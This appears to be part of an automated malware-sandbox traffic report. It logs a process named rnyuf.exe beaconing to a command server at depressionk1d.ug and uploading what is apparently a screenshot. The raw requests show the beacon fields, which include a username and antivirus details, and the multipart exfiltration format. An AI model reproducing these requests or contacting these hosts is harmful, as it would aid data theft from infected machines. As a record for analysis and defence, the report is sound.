                          Nov 12, 2021 22:23:15.354157925 CET2001OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:15.354197979 CET2010OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:15.354348898 CET2012OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:15.376897097 CET2018OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:15.376960993 CET2040OUTData Raw: af 69 17 b3 17 b1 9a dd 11 81 9a 90 51 b4 8a 50 33 45 ca 51 68 75 28 a4 c5 38 0a 9b 94 28 a7 52 01 4a 05 4b 2d 21 40 a7 81 4d 02 9e 2a 59 68 70 1c 57 15 f1 04 ff 00 c4 ba 3f fa ea 3f 91 ae d8 57 0f f1 04 ff 00 c4 bd 3f eb b0 fe 54 e9 ee 57 54 78
                          Data Ascii: iQP3EQhu(8(RJK-!@M*YhpW??W?TWTx-&)=y#]*t/<_{_)+4dG+u,C*}?Z1?T,g8G*eYo-5_3bMVF?og
                          Nov 12, 2021 22:23:15.376981974 CET2041OUTData Raw: 40 f9 fd d4 9e 8a 2b e6 80 6b d2 c0 fc 2c 75 3e 08 fc c5 3c 52 67 9a 42 79 a5 ae e3 01 c2 96 90 52 d3 10 51 9a 42 68 a2 e0 28 a5 ed 40 a2 98 80 f5 a7 af 4a 6d 2e 4d 34 26 3f 3c d1 4d 06 94 1c 9a 62 1d 47 4a 41 4b 4c 42 d0 29 05 2d 02 1c 29 45 36
                          Data Ascii: @+k,u><RgByRQBh(@Jm.M4&?<MbGJAKLB)-)E6%4P!iiE0Gd.ifXRx5H~iKM=(hCN(p4NUE-4t!4)D9S(D4hP4)<U"1NRLQK@
                          Nov 12, 2021 22:23:15.376991987 CET2046OUTData Raw: 2b c0 6b dd be 03 de 5a da 78 7f 56 fb 4d cc 30 ee ba 5d be 6c 81 73 84 e7 19 ac 2b fc 06 b4 7e 23 9f ff 00 84 73 5c ff 00 a0 2e a3 ff 00 80 af fe 14 a3 c3 ba ea b0 61 a3 ea 40 83 90 45 ab f1 fa 57 bb ff 00 6c 69 9f f4 12 b3 ff 00 c0 84 ff 00 1a
                          Data Ascii: +kZxVM0]ls+~#s\.a@EWliO/v_]U?Y'Wwe)IdePLmZ5EU?AK/O>2eT6u<KSjV:wwje;j@S%-4&wN5X%WxP2
                          Nov 12, 2021 22:23:15.424283981 CET2083INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:15 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          130192.168.2.449915178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:46.119458914 CET6928OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:46.145697117 CET6929INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:46 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          131192.168.2.449916178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:46.318733931 CET6929OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:46.346065044 CET6930INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:46 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          132192.168.2.449917178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:46.479212999 CET6931OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:46.504889011 CET6931INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:46 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          133192.168.2.449918178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:46.651496887 CET6932OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:46.676376104 CET6932INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:46 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          134192.168.2.449919178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:46.678769112 CET6932OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:46.678903103 CET6933OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:46.679142952 CET6943OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:46.679253101 CET6945OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:46.701410055 CET6947INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:46 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:46.701715946 CET6952OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:46.701801062 CET6958OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:46.701841116 CET6967OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:46.701853991 CET6972OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:46.724400043 CET6978OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:46.724466085 CET6988OUTData Raw: af 69 17 b3 17 b1 9a dd 11 81 9a 90 51 b4 8a 50 33 45 ca 51 68 75 28 a4 c5 38 0a 9b 94 28 a7 52 01 4a 05 4b 2d 21 40 a7 81 4d 02 9e 2a 59 68 70 1c 57 15 f1 04 ff 00 c4 ba 3f fa ea 3f 91 ae d8 57 0f f1 04 ff 00 c4 bd 3f eb b0 fe 54 e9 ee 57 54 78
                          Data Ascii: iQP3EQhu(8(RJK-!@M*YhpW??W?TWTx-&)=y#]*t/<_{_)+4dG+u,C*}?Z1?T,g8G*eYo-5_3bMVF?og
                          Nov 12, 2021 22:23:46.724520922 CET6993OUTData Raw: 37 92 6e 14 6d 93 19 da ca c1 86 47 a6 54 57 95 86 9a 85 68 4a 5b 26 bf 33 aa ac 5b 83 4b b1 f2 86 68 07 34 bb 29 42 1a fb ab 1e 06 82 52 d1 b4 d2 ec 34 f5 10 94 52 ec 34 bb 0d 3b 05 cf b4 09 ac a7 3f e9 32 ff 00 be 7f 9d 69 93 59 2e 7f d2 65 ff
                          Data Ascii: 7nmGTWhJ[&3[Kh4)BR4R4;?2iY.e|:JC`1O:_UG_8P<otRc"z20S{Wzy(h/q3Gk*e(M8BM\MKqkGpEboAm=x:4wk,


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          135192.168.2.449920178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:46.814727068 CET7022OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:46.840790987 CET7022INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:46 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          136192.168.2.449921178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:47.417336941 CET7023OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:47.444164038 CET7023INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:47 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          137192.168.2.449922178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:47.606173038 CET7024OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:47.631705046 CET7024INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:47 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          138192.168.2.449923178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:47.640499115 CET7025OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:47.640903950 CET7025OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:47.641149044 CET7035OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
